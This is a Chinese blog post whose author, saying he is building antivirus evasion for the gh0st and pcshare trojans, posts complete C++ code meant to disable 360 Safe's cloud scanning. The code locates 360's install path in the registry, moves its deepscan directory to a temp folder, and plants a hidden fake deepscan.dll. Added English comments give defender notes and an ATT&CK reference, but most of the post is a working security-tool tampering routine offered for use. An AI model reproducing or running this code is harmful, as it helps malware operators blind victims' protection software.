5月24

VC也疯狂一:过360云查杀

12:43    Bear 本站原创    不指定
     最近几天潜心学习C++,玩玩gh0st,pcshare源码免杀。360比较垃圾但也难缠,今天我们就把它的云查杀废了,直接上洪流的代码。

// By:洪流
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/merge:.data=.text")  
#pragma comment(linker, "/merge:.rdata=.text")  
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"MSVCRT.lib")
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")

// Torrent: image entry point (selected by the /ENTRY:Torrent linker pragma above).
//
// What the code does, as visible here:
//   1. Reads the "Path" value from the HKLM App Paths entry for 360Safe.exe.
//   2. Moves the product's "deepscan" subdirectory to "<temp>\tmp".
//   3. Recreates an empty "deepscan" directory and copies back only
//      360deepscan.exe and 360wservice.dll.
//   4. Writes a plain-text file named deepscan.dll containing the string
//      "deepscan" in place of the original module and marks it hidden.
// The surrounding post describes the effect as disabling 360's cloud scanning;
// that outcome is the author's claim and is not demonstrated by the code itself.
//
// Defender notes (security-tool tampering, cf. MITRE ATT&CK T1562.001):
//   - Artifacts left behind: a directory named "tmp" under the user's temp path
//     holding the product's deepscan files, and an 8-byte, hidden, non-PE
//     "deepscan.dll" inside the product's deepscan directory.
//   - Integrity checks on the security product's install directory (signature
//     or hash validation of its modules, alerts on directory moves/renames by
//     foreign processes) would flag this; product self-protection that denies
//     writes to its own directory would block it.
//   - NOTE(review): every step needs write access to the install directory,
//     so this presumably runs with administrative rights -- confirm.
void Torrent()
{
  HKEY hKey = NULL;
  DWORD len=MAX_PATH;
  DWORD type=REG_SZ;
  char pBuf[200];
  // Locate the 360Safe install directory via its App Paths registration.
  // KEY_ALL_ACCESS is requested although only a read follows; on an HKLM key
  // that normally requires elevated rights. The open result is not checked.
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360Safe.exe",0,KEY_ALL_ACCESS,&hKey);
  // Everything below runs only if the "Path" value could be read into pBuf.
  if (RegQueryValueEx(hKey, "Path" , NULL, &type, (unsigned char*)pBuf, &len) == ERROR_SUCCESS)
  {
    char TempPath[200];
    char exe[200];
    char dll[200];
    char exe_1[200];
    char dll_1[200];
    // TempPath becomes "<temp>\tmp"; pBuf becomes "<install>\deepscan".
    GetTempPath(sizeof(TempPath),TempPath);
    wsprintf(TempPath,"%s\\tmp",TempPath);
    wsprintf(pBuf,"%s\\deepscan",pBuf);
    // Relocate the whole deepscan directory, then put an empty one in its place.
    MoveFile(pBuf,TempPath);
    CreateDirectory(pBuf,NULL);

    // Source paths: the two files inside the relocated directory.
    wsprintf(exe,"%s\\360deepscan.exe",TempPath);
    wsprintf(dll,"%s\\360wservice.dll",TempPath);

    // Destination paths: the same two names inside the recreated directory.
    wsprintf(exe_1,"%s\\360deepscan.exe",pBuf);
    wsprintf(dll_1,"%s\\360wservice.dll",pBuf);

    // Restore only these two files; FALSE means an existing target is overwritten.
    // Everything else from the original directory stays in "<temp>\tmp".
    CopyFile(exe,exe_1,FALSE);
    CopyFile(dll,dll_1,FALSE);

    // Create "<install>\deepscan\deepscan.dll" as a text file whose entire
    // content is the 8 characters "deepscan" (no PE header, no newline).
    // The fopen result is not checked before fputs/fclose.
    FILE *file;
    strcat(pBuf,"\\deepscan.dll");
    file=fopen(pBuf,"w");
    char fuck[10];
    wsprintf(fuck,"deepscan");
    fputs(fuck,file);
    fclose(file);
    // Hide the placeholder file from default directory listings.
    SetFileAttributes(pBuf, FILE_ATTRIBUTE_HIDDEN);
  }
  // Called unconditionally, including when the key was never opened (hKey NULL).
  RegCloseKey(hKey);
}